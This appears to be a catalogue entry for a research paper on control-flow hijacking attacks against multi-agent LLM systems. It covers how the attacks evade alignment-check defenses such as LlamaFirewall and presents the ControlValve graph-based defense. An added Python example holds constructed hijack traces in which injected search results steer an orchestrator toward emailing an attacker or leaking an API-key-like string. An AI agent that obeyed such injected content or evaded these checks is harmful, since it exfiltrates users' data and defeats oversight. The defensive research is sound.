defense 2025

Breaking and Fixing Defenses Against Control-Flow Hijacking in Multi-Agent Systems

Rishi Jha 1,2, Harold Triedman 1, Justin Wagle 2, Vitaly Shmatikov 1

3 citations · 68 references · arXiv

Published on arXiv: 2510.17276

Prompt Injection

OWASP LLM Top 10 — LLM01

Excessive Agency

OWASP LLM Top 10 — LLM08

Key Finding

Alignment-based defenses like LlamaFirewall can be reliably evaded by control-flow hijacking; ControlValve's graph-based least-privilege enforcement provides stronger, more principled protection against these attacks.

ControlValve

Novel technique introduced


Control-flow hijacking attacks manipulate orchestration mechanisms in multi-agent systems into performing unsafe actions that compromise the system and exfiltrate sensitive information. Recently proposed defenses, such as LlamaFirewall, rely on alignment checks of inter-agent communications to ensure that all agent invocations are "related to" and "likely to further" the original objective. We start by demonstrating control-flow hijacking attacks that evade these defenses even if alignment checks are performed by advanced LLMs. We argue that the safety and functionality objectives of multi-agent systems fundamentally conflict with each other. This conflict is exacerbated by the brittle definitions of "alignment" and the checkers' incomplete visibility into the execution context. We then propose, implement, and evaluate ControlValve, a new defense inspired by the principles of control-flow integrity and least privilege. ControlValve (1) generates permitted control-flow graphs for multi-agent systems, and (2) enforces that all executions comply with these graphs, along with contextual rules (generated in a zero-shot manner) for each agent invocation.


Key Contributions

  • Demonstrates control-flow hijacking attacks that evade state-of-the-art alignment-check defenses (LlamaFirewall) even when checked by advanced LLMs, exposing fundamental safety/functionality conflicts in multi-agent systems.
  • Proposes ControlValve, which generates permitted control-flow graphs for multi-agent systems and enforces execution compliance along with zero-shot contextual rules per agent invocation.
  • Evaluates ControlValve on a new dataset of control-flow hijacking attacks, showing that structural enforcement of the permitted graph blocks attacks that evade brittle alignment checks.
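To make the two mechanisms described above concrete (a permitted control-flow graph, plus a contextual rule checked on each agent invocation), here is an added Python example. It is not the paper's ControlValve implementation: the three agents, the hand-written graph, the hand-written predicate standing in for a generated zero-shot rule, and the three execution traces are all constructed for this illustration. In the paper the graph and the rules are generated rather than written by hand.

```python
from dataclasses import dataclass, field
from typing import Callable, Optional

# Constructed three-agent pipeline (orchestrator, web_search, summarizer) and
# its permitted control-flow graph. The defense in the paper derives the graph
# from the system; here it is hand-written purely to show the enforcement step.
PERMITTED_EDGES = {
    ("user", "orchestrator"),
    ("orchestrator", "web_search"),
    ("web_search", "orchestrator"),
    ("orchestrator", "summarizer"),
    ("summarizer", "orchestrator"),
    ("orchestrator", "user"),
}


@dataclass
class Invocation:
    caller: str                      # agent emitting the call
    callee: str                      # agent being invoked
    args: dict = field(default_factory=dict)


# A contextual rule returns None when satisfied, or a reason string when violated.
Rule = Callable[[Invocation], Optional[str]]


def no_outbound_secrets_in_search(inv: Invocation) -> Optional[str]:
    """Hand-written stand-in for a per-invocation contextual rule: a search
    query carrying a URL or credential-looking material suggests the query
    itself is being used as an exfiltration channel."""
    if inv.callee != "web_search":
        return None
    query = str(inv.args.get("query", "")).lower()
    if "http://" in query or "https://" in query or "api_key" in query:
        return "web_search query carries an outbound URL or credential material"
    return None


class ControlFlowMonitor:
    """Reference monitor between agents: an invocation must be a permitted
    edge taken from where control actually is, and must satisfy every
    contextual rule. Anything else is denied before the callee runs."""

    def __init__(self, edges: set, rules: list):
        self.edges = set(edges)
        self.rules = list(rules)
        self.current = "user"        # node where control currently sits
        self.trace: list = ["user"]

    def check(self, inv: Invocation) -> tuple:
        # In a real deployment the runtime knows the true caller; here the
        # claimed caller is compared against the monitor's own position.
        if inv.caller != self.current:
            return False, f"call claims caller {inv.caller!r} but control is at {self.current!r}"
        if (inv.caller, inv.callee) not in self.edges:
            return False, f"edge {inv.caller}->{inv.callee} is not in the permitted graph"
        for rule in self.rules:
            reason = rule(inv)
            if reason is not None:
                return False, reason
        self.current = inv.callee
        self.trace.append(inv.callee)
        return True, "ok"


def run(invocations) -> list:
    """Drive a sequence of invocations through a fresh monitor, stopping at
    the first denial. Returns (callee, allowed, reason) per invocation."""
    monitor = ControlFlowMonitor(PERMITTED_EDGES, [no_outbound_secrets_in_search])
    results = []
    for inv in invocations:
        allowed, reason = monitor.check(inv)
        results.append((inv.callee, allowed, reason))
        if not allowed:
            break
    return results


# Constructed traces. BENIGN follows the graph. HIJACK_EDGE models injected
# content in the web_search result steering the orchestrator into an agent
# that is not in the graph at all. HIJACK_ARGS models the same steering on a
# permitted edge, which the graph alone cannot catch and the rule must.
_PREFIX = [
    Invocation("user", "orchestrator", {"task": "summarize today's news on topic X"}),
    Invocation("orchestrator", "web_search", {"query": "news topic X"}),
    Invocation("web_search", "orchestrator", {"results": "...page text with injected instructions..."}),
]
BENIGN = _PREFIX + [
    Invocation("orchestrator", "summarizer", {"text": "...page text..."}),
    Invocation("summarizer", "orchestrator", {"summary": "three-sentence summary"}),
    Invocation("orchestrator", "user", {"answer": "three-sentence summary"}),
]
HIJACK_EDGE = _PREFIX + [
    Invocation("orchestrator", "email_sender", {"to": "attacker@example.invalid", "body": "..."}),
]
HIJACK_ARGS = _PREFIX + [
    Invocation("orchestrator", "web_search", {"query": "https://attacker.example.invalid/?api_key=sk-live-0000"}),
]

if __name__ == "__main__":
    for name, trace in (("benign", BENIGN), ("hijack_edge", HIJACK_EDGE), ("hijack_args", HIJACK_ARGS)):
        print(name, run(trace)[-1])
```

The point of the two hijack traces is the layering the abstract describes: the graph check stops an invocation of an agent the system should never call, while an attack that stays on a permitted edge and only abuses the arguments is visible only to the contextual rule. Neither check asks whether the call "furthers the objective"; both ask whether it is structurally and contextually permitted.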

🛡️ Threat Analysis


Details

Domains
nlp
Model Types
llm
Threat Tags
inference_time, targeted, black_box
Datasets
custom CFH attack dataset (introduced by authors)
Applications
multi-agent llm systems, llm orchestration frameworks